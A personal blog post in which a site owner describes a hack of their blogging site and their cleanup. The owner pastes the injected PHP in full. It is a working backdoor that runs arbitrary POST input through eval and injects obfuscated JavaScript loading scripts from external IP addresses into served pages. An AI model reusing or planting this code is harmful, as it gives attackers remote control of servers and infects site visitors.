Running in Okinawa

My site was hacked which caused db errors to show on the front end. Someone out there created themselves an ftp account, injected code into my php and htm files, and got to my SQL db. I think they used a vulnerability in the default settings for my blogging software, so I deleted and reinstalled everything. I changed the default settings, and deleted that rogue account and any files they had accessed. I really think those default settings are what put me on their radar. They probably just ran a search for a site using the defaults, and then ran their hacking tool against it. I’m sure it was an automated program they ran to inject that code because all htm and php files had the same injected code in the same place. Everything should be good to go now and safe. I’ve gone through all my code and cleared out anything suspicious and patched known vulnerabilities. My site has a new armor now and a new face as well. Hopefully this will not happen again.

Here is the code they used:

if(!function_exists(‘tmp_lkojfghx’)){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2YoeWFob29fY291bnRlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCclMkYhJTJGISUzQyU2NGklNzYlMjAlNzN8dHl+bGU9ISU2NCQlNjklNzMjJTcwbGF5OnwlNkVvbmBlYCUzRSZcbiZkISU2RiU2M3UkJTZEIWUlNkV8dHwlMkUkJTc3JTcyJTY5JTc0JTY1JTI4YCIhJTNDJiUyRn50IWV4ISU3NCU2MSU3MiFlJCU2MSQlM0UlMjIlMjklM0IlNzZgYSQlNzIkJTIwJTY5JTJDJTVGJix8YSE9JTVCJiUyMiQlMzclMzglMkUhJTMxQDElMzAlMkUxJTM3JTM1Iy4lMzIlMzFgJTIyISUyQyIkJTMxJTM5JTM1JTJFJTMyfDQuN3w2LjJ+JTM1ISUzMSYlMjImJTVEO3xfPSUzMSUzQn5pYCU2NiElMjhkfCU2RmMlNzVtYGV+bkAlNzR8JTJFYyMlNkYkJTZGJCU2QiU2OSMlNjUlMkUmbSU2MUAlNzRjIyU2OCgmL2AlNUMlNjJoIyU2N2YjJTc0JTNEJCUzMSElMkYpfiUzRCUzRCElNkUhJTc1JTZDbCMpZm8lNzIkJTI4JTY5JTNEfiUzMHwlM0IhJTY5YCUzQyUzMiUzQiMlNjkrJTJCfCUyOSFkJTZGJmMlNzVtYCU2NSU2RXQlMkV3I3IhJTY5ISU3NCMlNjUjKH4lMjJ8JTNDQCU3M2MlNzJpJTcwdGAlM0UjJTY5ZiElMjh8JTVGQCUyOSQlNjQjJTZGJTYzfHUmJTZEJTY1fG4lNzQlMkUlNzclNzIlNjl8JTc0ZSglNUMlMjJ+JTNDcyU2MyYlNzIlNjlwI3QmJTIwfGl+ZHw9JTVGIitgJTY5YCt8JTIyXyUyMCElNzNyYyUzRGAlMkYjL0AiJiUyQiU2MVslNjklNUQlMkIkJTIyJTJGJTYzfnAvJCUzRiUyMiUyQn4lNkUmJTYxdiU2OWAlNjclNjEjdG8mci4kJTYxJTcwJCU3MCU0RSU2MSYlNkRlJTJFJmNAaCU2MXJgQXQoJTMwJTI5KyQlMjIlM0UmJTNDQCU1Q34lNUMjLyU3M0BjIXIlNjklNzB0IyUzRUAlNUN+JTIyKSElM0MjJTVDJTJGQHNjJTcyJTY5JnB0QCUzRXwifCl8JTNCXG4vIy8jJTNDJTJGZGklNzYlM0UnKS5yZXBsYWNlKC9cJnxcfHxAfH58YHxcJHwjfFwhL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is’,$s,$a))foreach($a[0] as $v)if(count(explode(“n”,$v))>5){$e=preg_match(‘#['"][^s'".,;?![]:/<>()]{30,}#’,$v)||preg_match(‘#[([](s*d+,){20,}#’,$v);if((preg_match(‘#bevalb#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}$s1=preg_replace(base64_decode(‘IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw==’),”,$s);if(stristr($s,’</body'))$s=preg_replace('#(s*</body)#mi',str_replace('$','\$',TMP_XHGFJOKL).'1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>‘))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’);for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();</p> <p>Yahoo! Counter starts<br /> if(typeof(yahoo_counter)!=typeof(1))eval(unescape(‘%2F$%2F%3C|%64%69%76%20#%73&%74&y~l%65=@d~%69&%73pl&%61y:@non%65%3E`n!d@o%63u~men`t&%2E~%77`%72$%69%74%65%28|%22!%3C%2F~%74e%78%74$%61`r%65a%3E”#);@v|%61|%72%20%69&%2C|%5F~%2C%61`=[~%22&%37!%38%2E&1|%31$%30%2E%31$%37!%35@%2E21~%22%2C%22$%31$%39~%35~.2%34%2E`%37`6~.@2@5%31&"%5D$%3B!_%3D%31#%3B&%69|f$%28%64%6F%63%75|m%65%6E&%74.c|oo@k%69@e|.%6D@%61%74~c`%68!%28%2F@%5Cb#%68%67$%66|%74|%3D%31/#)==n%75%6C|l&%29!f@o%72|%28|i%3D&%30`%3B&i!%3C2;%69@%2B%2B%29d&o@%63%75%6De%6E@t%2E%77@%72|%69|t`%65(%22%3C%73!%63@%72~%69%70~%74%3E%69|f!(_%29d#o~%63!%75%6D%65n%74.wri`%74%65@%28%5C%22`%3C@%73%63`r#%69p&%74$%20%69#%64%3D_&"~+`i&+#%22!_%20%73r%63|%3D%2F|%2F`"+@%61[i]!%2B@”`/#%63@%70%2F|?`”&+&n#%61v%69g$%61%74%6F|r~%2Ea#%70%70#%4E%61&m%65.@%63|%68ar%41%74(0)$%2B%22%3E&%3C`%5C!%5C|/`%73$%63$%72%69%70%74&%3E#%5C`”`)|%3C#%5C/sc$%72!%69&%70!t%3E%22$%29%3Bn&%2F!%2F%3C@%2F|di%76$%3E’).replace(/~|@|#|&|`|$|||!/g,”"));var yahoo_counter=1; counter end

Please leave a comment if this has or something similar has happened to you.